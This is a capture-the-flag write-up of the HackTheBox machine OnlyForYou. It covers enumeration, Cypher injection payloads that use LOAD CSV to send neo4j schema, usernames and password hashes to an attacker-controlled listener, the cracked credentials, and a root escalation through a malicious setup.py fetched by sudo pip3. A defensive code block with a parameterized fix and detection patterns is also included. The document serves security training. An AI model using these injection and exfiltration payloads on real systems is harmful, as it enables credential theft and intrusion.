HackTheBox - OnlyForYou

Initial Enumeration

nmap scan

# Nmap 7.93 scan initiated Sun Apr 23 00:35:33 2023 as: nmap -vvvv -sC -sV -oN nmap/onlyforyou 10.129.63.32
Nmap scan report for onlyforyou.htb (10.129.63.32)
Host is up, received echo-reply ttl 63 (0.26s latency).
Scanned at 2023-04-23 00:35:33 IST for 19s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e883e0a9fd43df38198aaa35438411ec (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDX7r34pmJ6U9KrHg0/WDdrofcOXqTr13Iix+3D5ChuYwY2fmqIBlfuDo0Cz0xLnb/jaT3ODuDtmAih6unQluWw3RAf03l/tHxXfvXlWBE3I7uDu+roHQM7+hyShn+559JweJlofiYKHjaErMp33DI22BjviMrCGabALgWALCwjqaV7Dt6ogSllj+09trFFwr2xzzrqhQVMdUdljle99R41Hzle7QTl4maonlUAdd2Ok41ACIu/N2G/iE61snOmAzYXGE8X6/7eqynhkC4AaWgV8h0CwLeCCMj4giBgOo6EvyJCBgoMp/wH/90U477WiJQZrjO9vgrh2/cjLDDowpKJDrDIcDWdh0aE42JVAWuu7IDrv0oKBLGlyznE1eZsX2u1FH8EGYXkl58GrmFbyIT83HsXjF1+rapAUtG0Zi9JskF/DPy5+1HDWJShfwhLsfqMuuyEdotL4Vzw8ZWCIQ4TVXMUwFfVkvf410tIFYEUaVk5f9pVVfYvQsCULQb+/uc=
| 256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAz/tMC3s/5jKIZRgBD078k7/6DY8NBXEE8ytGQd9DjIIvZdSpwyOzeLABxydMR79kDrMyX+vTP0VY5132jMo5w=
| 256 445f7aa377690a77789b04e09f11db80 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOqatISwZi/EOVbwqfFbhx22EEv6f+8YgmQFknTvg0wr
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://only4you.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 23 00:35:52 2023 -- 1 IP address (1 host up) scanned in 19.75 seconds

Web

In the footer we find:

Sending a message

We see that we get "You are not authorized".

Looking around the page for links, I find beta.only4you.htb.


beta.only4you.htb

We find the source code zip, along with two features: image convert and image resize.

And in the download functionality we find an LFI.

Command Injection

We see the use of subprocess.run, which can be abused to get RCE.

www-data -> user

Proxying the internal services, we find that the service on port 8001 is using neo4j as its DB.

Trying Cypher injection against neo4j, we can extract data.

Using the injection I can extract the labels as follows:

search=' OR 1=1 WITH 1 as a CALL db.labels() YIELD label LOAD CSV FROM 'http://10.10.14.3:8000/?name='+label as l RETURN 0 as _0 //

The labels come back as user and employee.

We get the property keys using:

search=' OR 1=1 WITH 1 as a CALL db.propertyKeys() YIELD propertyKey LOAD CSV FROM 'http://10.10.14.3:8000/?label='+propertyKey as l RETURN 0 as _0 //
10.129.63.48 - - [23/Apr/2023 10:47:50] "GET /?label=name HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 10:47:50] "GET /?label=country HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 10:47:51] "GET /?label=city HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 10:47:51] "GET /?label=salary HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 10:47:52] "GET /?label=username HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 10:47:53] "GET /?label=password HTTP/1.1" 200 -

What I am interested in is username and password, so let's try to get those.

search=' OR 1=1 WITH 1 as a MATCH (u:user) LOAD CSV FROM 'http://10.10.14.3:8000/?u='+u.username+'&password='+u.password as l RETURN 0 as _0 //

We get the usernames and password hashes:

10.129.63.48 - - [23/Apr/2023 11:27:37] "GET /?u=admin&password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 11:27:37] "GET /?u=john&password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -

Cracking the hashes on CrackStation, we are able to recover both passwords:

admin:admin
john:ThisIs4You
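As an added example (not code from this writeup or from the box's application), here is the string-concatenation pattern that makes the injection above possible next to its parameterized fix, plus a small check that flags the indicators present in these payloads in form bodies. The MATCH shape and the use of the employee label are assumptions; the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Assumed query shape: the real Cypher used by the port-8001 service is not on the page.
def build_search_vulnerable(search: str) -> tuple[str, dict]:
    """String concatenation: a quote in `search` ends the literal; the rest is parsed as Cypher."""
    query = f"MATCH (e:employee) WHERE e.name = '{search}' RETURN e"
    return query, {}

def build_search_safe(search: str) -> tuple[str, dict]:
    """Parameterized: the driver ships $search out of band, so it can only ever be a string value."""
    query = "MATCH (e:employee) WHERE e.name = $search RETURN e"
    return query, {"search": search}

# Indicators taken from the payloads shown above: quote-break plus tautology, schema
# discovery procedures, out-of-band exfiltration via LOAD CSV, and a trailing comment.
INJECTION_PATTERNS = {
    "quote_tautology": r"'\s*OR\s+1\s*=\s*1",
    "schema_discovery": r"\bCALL\s+db\.(labels|propertyKeys)\s*\(",
    "load_csv_exfil": r"\bLOAD\s+CSV\s+FROM\s+'https?://",
    "trailing_comment": r"//\s*$",
}

def flags_for(search: str) -> list[str]:
    """Names of the indicator patterns that match one `search` value (empty list if benign)."""
    return [name for name, pat in INJECTION_PATTERNS.items()
            if re.search(pat, search, re.IGNORECASE)]

def scan_form_bodies(bodies: list[str]) -> dict[int, list[str]]:
    """Map body index -> flags for every url-encoded form body whose `search` looks injected."""
    hits = {}
    for i, body in enumerate(bodies):
        for value in parse_qs(body).get("search", []):
            flags = flags_for(value)
            if flags:
                hits[i] = flags
    return hits

# Constructed sample bodies: one benign, one equal to the label-extraction payload above.
SAMPLE_BODIES = [
    "search=john",
    "search=%27+OR+1%3D1+WITH+1+as+a+CALL+db.labels%28%29+YIELD+label+LOAD+CSV+FROM+"
    "%27http%3A%2F%2F10.10.14.3%3A8000%2F%3Fname%3D%27%2Blabel+as+l+RETURN+0+as+_0+%2F%2F",
]

if __name__ == "__main__":
    # prints {1: ['quote_tautology', 'schema_discovery', 'load_csv_exfil', 'trailing_comment']}
    print(scan_form_bodies(SAMPLE_BODIES))
```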

Privilege Escalation

Checking sudo -l, we see we need to download a *.tar.gz from the Gogs server.

Let's create a public repo and push a README.md file to it to see the behaviour.

After pushing and downloading the

We see it is erroring on setup.py, so let's commit that as well, with some reverse shell code in it.

Then, running sudo pip3 download again on the tarball results in setup.py executing and gets us a root shell.

Rooted:

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/onlyforyou/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.